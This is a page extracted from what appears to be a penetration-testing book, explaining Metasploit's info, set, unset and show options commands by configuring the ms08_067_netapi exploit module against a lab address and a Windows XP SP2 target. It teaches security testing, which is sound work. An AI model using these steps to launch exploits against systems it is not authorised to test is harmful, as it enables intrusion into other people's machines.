background image

The Joy of Exploitation

63

info

When the short description of a module provided by the 

show

 and 

search

 com-

mands isn’t sufficient, use the 

info

 command followed by the module name 

to display all the information, options, and targets available for that module:

msf exploit(ms08_067_netapi) > 

info

set and unset

All the options for a given Metasploit module must be either set or unset, 
especially if they are marked as 

required

 or 

yes

. When you enter 

show options

you will see information that specifies whether a field is required. Use the 

set

 

command to set an option (turn it on); use 

unset

 to turn a setting off. The 

next listing shows the 

set

 and 

unset

 commands in use.

NOTE

Notice that the variables are referenced using uppercase characters. This isn’t required, 
but it is considered good practice.

msf exploit(ms08_067_netapi) > 

set RHOST 192.168.1.155 

RHOST => 192.168.1.155
msf exploit(ms08_067_netapi) > 

set TARGET 3 

TARGET => 3
msf exploit(ms08_067_netapi) > 

show options 

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.155    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   3   Windows XP SP2 English (NX)

msf exploit(ms08_067_netapi) > unset RHOST
Unsetting RHOST...

At   we set the target IP address (

RHOST

) to 

192.168.1.155

 (our target 

machine). At   we 

set

 the target to 

3

, the “Windows XP SP2 English (NX)” 

that we listed with 

show targets

 in “msf> show targets” on page 62. Running 

show options

 at   confirms that our settings have been populated, as shown in 

the 

Module options

 output.